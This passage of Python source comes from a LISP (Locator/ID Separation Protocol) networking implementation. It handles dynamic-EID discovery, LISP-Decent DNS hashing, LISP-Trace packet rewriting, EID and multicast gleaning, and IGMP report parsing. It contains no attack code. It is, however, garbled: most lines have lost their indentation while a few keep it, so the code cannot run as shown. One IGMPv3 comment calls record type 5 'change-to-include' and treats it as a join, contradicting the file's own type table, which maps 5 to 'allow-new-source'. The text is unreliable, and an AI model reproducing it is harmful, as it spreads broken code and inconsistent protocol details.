deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
                    lisp_itr_discover_eid(db, seid, device, interface,
                        punt_socket)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
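#
# example_punt_discovery_message
#
# Illustrative punt "discovery" message (assumed values) in the format
# documented above lisp_process_punt().
#
def example_punt_discovery_message():
    return({ "type" : "discovery", "source-eid" : "10.0.0.1",
        "dest-eid" : "10.0.0.2", "interface" : "eth0",
        "instance-id" : 1000 })
#enddef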
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
        eid_string, input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    #endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if the configured LISP-Decent modulus is non-zero and a DNS
# suffix is configured, meaning we are using the LISP-Decent pull-based
# mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
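#
# Example (illustrative; modulus and suffix values assumed): with
# lisp_decent_modulus = 16 and a configured DNS suffix of
# "map.example.com", an EID whose print_prefix() string is
# "[1000]192.168.1.0/24" is placed at:
#
#   index = int(hashlib.sha256("[1000]192.168.1.0/24").hexdigest(), 16) % 16
#   dns_name = str(index) + ".map.example.com"
#
# so every xTR deterministically agrees on which map-server set serves
# the EID-prefix.
#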
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is an address passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display the port if this call is from an encapsulating RTR using a
# translated RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is an ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["latencies"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for the record. If we are appending the first ITR node entry, get
# its RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are the destination EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to be encapsulated, or
# we are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up the UDP length, and recompute the UDP checksum for an IPv6 packet
# (leave it zero otherwise). Only compute the checksum when the Trace went
# round-trip and this is the local ETR delivering the EID-based Trace packet
# to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and the IP
# header field changes are all reflected in the new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
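#
# Example of the JSON array carried in a LISP-Trace packet after an ITR
# and an ETR have each appended a node entry (illustrative addresses,
# timestamps elided):
#
#   [ { "seid" : "[1000]10.1.1.1", "deid" : "[1000]10.2.2.2", "paths" : [
#       { "node" : "ITR", "srloc" : "192.168.1.1", "drloc" : "192.168.2.1",
#         "hn" : "itr-host", "encap-ts" : "..." },
#       { "node" : "ETR", "srloc" : "192.168.1.1", "drloc" : "10.2.2.9",
#         "hn" : "etr-host", "decap-ts" : "..." } ] } ]
#
# A second record with seid/deid swapped is appended at the destination
# ETR so the return path is recorded in the same packet.
#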
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if we should glean the EID and
# RLOC. Find the first match. Return (False, False, False) if there are no
# configured glean mappings. The second return value indicates whether the
# matched entry was configured to RLOC-probe the gleaned RLOC, and the third
# whether it was configured to send IGMP queries.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
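#
# Example of a lisp_glean_mappings entry the loop above matches against
# (illustrative values; the prefix values are lisp_address() instances
# built by the configuration code):
#
#   { "instance-id" : (1000, 1000),
#     "eid-prefix"  : <lisp_address for 10.1.0.0/16>,
#     "rloc-prefix" : <lisp_address for 192.168.0.0/16>,
#     "rloc-probe"  : True,
#     "igmp-query"  : False }
#
# The first matching entry decides whether to glean as well as whether to
# RLOC-probe and IGMP-query the gleaned RLOC.
#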
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
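#
# Example of the lisp_gleaned_groups bookkeeping updated above: one
# timestamp per (EID, group) join, so actively joined groups are not
# timed out (illustrative values):
#
#   lisp_gleaned_groups = {
#     "10.1.1.1" : { "224.1.1.1" : <timestamp>, "224.2.2.2" : <timestamp> }
#   }
#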
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Report types 0x12, 0x16, and 0x22 indicate joins; type 0x17 is an IGMPv2
# leave. For IGMPv3 reports, join versus leave is decided per group record
# (see lisp_igmp_record_types below).
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when the packet is an IGMP query and
# an array of [source, group, join?] entries when it is a report. The caller
# must check the return type; only callers with context to handle IGMP
# queries should act on a True return.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR running as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
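#
# For type 0x22 the second 32-bit word of the header holds Reserved
# (zero) in the high 16 bits and the record count in the low 16 bits, so
# the ntohl'ed value parsed into group.address above is used directly as
# the record count.
#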
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return(register_entries)
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records).
#
for j in range(source_count):
if (len(igmp) < source_size): return(register_entries)
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to the caller so it can send a Map-Register. They
# are put in a multicast Info LCAF Type with ourselves as an RLE. This is
# specified in RFC 8378.
#
return(register_entries)
#enddef
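#
# Example caller (illustrative sketch, not called by production code):
# how the return value of lisp_process_igmp_packet() is meant to be
# interpreted. Entries are [source, group, join?] triples where source is
# None for (*,G) state.
#
def lisp_example_handle_igmp(packet):
    entries = lisp_process_igmp_packet(packet)
    if (type(entries) == bool): return
    for source, group, joinleave in entries:
        if (joinleave):
            pass # register (source, group) here, None source means (*,G)
        else:
            pass # withdraw (source, group) here
        #endif
    #endfor
#enddef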
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and for IGMP-reported groups in one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do a lookup to see if the EID is already in the map-cache. If it is,
# refresh its timestamp, since we received a packet from the gleaned source
# EID, and check whether the RLOC or encap-port needs updating.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to a new map-cache entry or updating the RLOC for an existing
# entry.
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group?
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return a dictionary array if the json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if (tel.has_key("type") == False): return(None)
if (tel.has_key("sub-type") == False): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
